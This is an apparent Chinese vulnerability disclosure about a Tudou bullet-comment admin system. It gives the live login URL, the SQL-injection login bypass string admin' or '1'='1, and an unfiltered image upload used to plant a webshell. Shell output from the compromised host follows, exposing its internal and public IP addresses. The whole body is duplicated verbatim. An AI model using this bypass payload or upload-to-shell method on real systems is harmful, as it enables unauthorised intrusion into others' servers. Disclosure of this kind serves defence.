土豆某系统SQL注入到Getshell
rt
http://xianchang03.danmu.tudou.com/login.do
土豆弹幕系统 之前报过弱口令 其实登录有个注入
admin' or '1'='1 直接bypass登录
http://www.2cto.com/uploadfile/Collfiles/20160112/20160112091840202.png
可以控制弹幕 不说
后台传图片 无任何过滤 可shell
http://www.2cto.com/uploadfile/Collfiles/20160112/20160112091840203.png
/home/app_admin/apache-tomcat/webapps/dmfile/>id
uid=501(app_admin) gid=501(app_admin) groups=501(app_admin)
/home/app_admin/apache-tomcat/webapps/dmfile>ifconfig
eth0 Link encap:EthernetHWaddr 00:18:51:1D:52:20
inet addr:10.108.19.65Bcast:10.108.19.255Mask:255.255.255.0
inet6 addr: fe80::218:51ff:fe1d:5220/64 Scope:Link
UP BROADCAST RUNNING MULTICASTMTU:1500Metric:1
RX packets:221236474134 errors:0 dropped:0 overruns:0 frame:0
TX packets:221450227112 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:252483004549751 (229.6 TiB)TX bytes:20605763332642 (18.7 TiB)
eth1 Link encap:EthernetHWaddr 00:18:51:59:22:64
inet addr:101.227.9.28Bcast:101.227.9.255Mask:255.255.255.0
inet6 addr: fe80::218:51ff:fe59:2264/64 Scope:Link
UP BROADCAST RUNNING MULTICASTMTU:1500Metric:1
RX packets:450103026 errors:0 dropped:0 overruns:0 frame:0
TX packets:13208323 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:27841613550 (25.9 GiB)TX bytes:8370498080 (7.7 GiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNINGMTU:65536Metric:1
RX packets:158360007 errors:0 dropped:0 overruns:0 frame:0
TX packets:158360007 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:32129258181 (29.9 GiB)TX bytes:32129258181 (29.9 GiB)
内网中
http://xianchang03.danmu.tudou.com/login.do
土豆弹幕系统 之前报过弱口令 其实登录有个注入
admin' or '1'='1 直接bypass登录
http://www.2cto.com/uploadfile/Collfiles/20160112/20160112091840202.png
可以控制弹幕 不说
后台传图片 无任何过滤 可shell
http://www.2cto.com/uploadfile/Collfiles/20160112/20160112091840203.png
/home/app_admin/apache-tomcat/webapps/dmfile/>id
uid=501(app_admin) gid=501(app_admin) groups=501(app_admin)
/home/app_admin/apache-tomcat/webapps/dmfile>ifconfig
eth0 Link encap:EthernetHWaddr 00:18:51:1D:52:20
inet addr:10.108.19.65Bcast:10.108.19.255Mask:255.255.255.0
inet6 addr: fe80::218:51ff:fe1d:5220/64 Scope:Link
UP BROADCAST RUNNING MULTICASTMTU:1500Metric:1
RX packets:221236474134 errors:0 dropped:0 overruns:0 frame:0
TX packets:221450227112 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:252483004549751 (229.6 TiB)TX bytes:20605763332642 (18.7 TiB)
eth1 Link encap:EthernetHWaddr 00:18:51:59:22:64
inet addr:101.227.9.28Bcast:101.227.9.255Mask:255.255.255.0
inet6 addr: fe80::218:51ff:fe59:2264/64 Scope:Link
UP BROADCAST RUNNING MULTICASTMTU:1500Metric:1
RX packets:450103026 errors:0 dropped:0 overruns:0 frame:0
TX packets:13208323 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:27841613550 (25.9 GiB)TX bytes:8370498080 (7.7 GiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNINGMTU:65536Metric:1
RX packets:158360007 errors:0 dropped:0 overruns:0 frame:0
TX packets:158360007 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:32129258181 (29.9 GiB)TX bytes:32129258181 (29.9 GiB)
内网中
解决方案:
修复。
页:
[1]